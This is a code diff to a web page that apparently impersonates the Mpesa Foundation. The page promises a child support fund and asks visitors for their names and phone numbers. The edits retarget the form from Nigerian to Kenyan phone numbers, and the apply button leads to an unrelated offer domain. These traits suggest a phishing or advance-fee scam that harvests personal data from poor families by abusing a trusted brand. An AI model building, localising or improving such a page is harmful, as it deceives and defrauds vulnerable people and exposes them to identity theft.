--- a/offer.html
+++ b/offer.html
@@ -907,10 +907,12 @@ text-align:center;
    <p style ="color:black"> The Mpesa Foundation is dedicated to adding value to people’s lives across Kenya by facilitating health, education and empowerment initiatives. Are You a Parent or Guardian, Apply For Child Support Fund By Filling The Provided Form and Choose Your Preffered Payment Method, Your Account Will Be Credited As Soon As Possible.👇👇👇</p>
     <!---350×70 ads--->
     <hr>
-    <label for="email"><p style ="color:green"><b>Your Name</b></p></label>
-    <input type="text" placeholder=" Enter Your Full Name..." name="Enter Your Full Name ..." required>
+    <label for="email"><p style ="color:green"><b>Your First Name</b></p></label>
+    <input type="text" placeholder=" Enter Your First Name..." name="Enter Your First Name ..." required>
+    <label for="email"><p style ="color:green"><b>Your Last Name</b></p></label>
+    <input type="text" placeholder=" Enter Your Last Name..." name="Enter Last Full Name ..." required>  
      <label for="email"><p style ="color:green"><b>Phone Number </b></p></label>
-    <input type="text" placeholder="e.g +2348012345678" name="email" required>
+    <input type="text" placeholder="e.g +254..." name="email" required>
     </div>
   <a style="width:100%; text-align:center; display:block; margin-top:10px;" href="https://mpesa-foundation.alloffer.pro/pg2" class="registerbtn" onclick="alert(" hi")"="">  APPLY NOW </a> 
    <hr>
